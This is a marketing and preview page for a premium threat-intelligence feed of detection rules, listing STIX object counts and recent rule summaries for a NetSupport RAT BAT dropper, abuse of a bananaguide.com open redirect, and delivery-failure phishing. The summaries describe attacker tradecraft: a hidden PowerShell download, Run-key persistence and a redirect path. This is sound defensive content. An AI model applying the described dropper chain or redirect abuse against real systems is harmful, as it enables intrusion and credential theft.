Description:
Premium feed that expands "Detection Rules Pro" Feed with analysis and guidance. The feed includes rule change analysis with impact guidance, correlation to active CVEs and threat campaigns, and a weekly detection engineering brief, all designed to support strategic decision-making, prioritization of efforts, and a robust, proactive detection posture. The feed is best suited for mature security operations centers, threat intelligence teams, and proactive detection engineers requiring advanced context.
Contents:
Identity: 39 Indicator: 7996 Note: 7076 Directory: 3608Domain-Name: 1075Email-Addr: 28File: 4567Ipv4-Addr: 54Ipv6-Addr: 12Process: 6557Relationship: 26421Windows-Registry-Key: 844
Application:
- Risk-based prioritization - focus your team's efforts on deploying and tuning detections that address the most current and impactful threats.
- Improved situational awareness - gain a deeper understanding of how community detections align with the evolving threat landscape, active vulnerabilities, and adversary TTPs.
- Proactive detection posture management - move beyond reactive alerting to strategically curating and maintaining your detection capabilities based on actionable intelligence.
- Reduced fatigue and improved resource allocation - maximize the impact of your detection engineering by providing decision support with tactical and strategic intelligence about threat detection landscape.
STIX/TAXII endpoints:
Content preview:
Latest 10 entities:
| Details | |
|---|---|
 | ANY.RUN Obfuscated BAT Dropper Delivers NetSupport RAT post Kql New rule This KQL query detects the execution of an obfuscated BAT dropper that delivers the NetSupport RAT. It identifies instances where cmd.exe initiates a .bat file, which in turn executes PowerShell with hidden window style and Invoke-WebRequest, followed by registry modifications to add client32.exe to the Run key. Relevant MITRE ATT&CK tactics: TA0005, TA0003 Relevant MITRE ATT&CK techniques: T1059.003, T1566.001, T1547.001 malicious-activity TA0005 TA0003 T1059.003 T1566.001 T1547.001 |
| Open Redirect: bananaguide.com Sublime-Security New rule This rule detects the use of the bananaguide.com redirect with a URL parameter in messages, which has been exploited in the wild. The rule checks for inbound message types containing links where the domain is bananaguide.com, the path is /thru.php, and the URL parameter is present and not redirecting back to bananaguide.com. It also negates trusted sender domains unless they fail DMARC authentication and excludes messages from bananaguide.com. Relevant MITRE ATT&CK tactics: TA0001, TA0009 Relevant MITRE ATT&CK techniques: T1598, T1189, T1204, T1566 credential-access malicious-activity TA0001 TA0009 T1598 T1189 T1204 T1566 |
| Credential phishing: Email delivery failure impersonation Sublime-Security New rule This rule detects phishing emails that impersonate email system notifications regarding delivery failures or other email system issues. It identifies emails that request users to take action to 'fix' or 'recover' their email functionality, which typically leads to credential harvesting portals. The rule analyzes email content, sender information, and links to identify potential phishing attempts. Relevant MITRE ATT&CK tactics: TA0001, TA0006 Relevant MITRE ATT&CK techniques: T1566, T1566.002, T1598, T1598.007 credential-access phishing TA0001 TA0006 T1566 T1566.002 T1598 T1598.007 |
 | file--0c1f67c1-3818-5514-b383-c56c23bb50aa |
 | process--c4988bad-df6a-4661-9a3b-a272f1efb204 |
 | windows-registry-key--6879fcd9-ca48-558a-90a0-ce718860f913 |
 | domain-name--a55309c3-ab50-531c-a66c-adf04038bdb9 |
| domain-name--2d8f3d77-dc85-5b86-90c1-bc48e6f8eb2d |
 | relationship--249ecb88-e876-49a8-8648-1b7688fb578c |
| relationship--dc0b0799-1c5a-421b-869e-bb7c701d293c |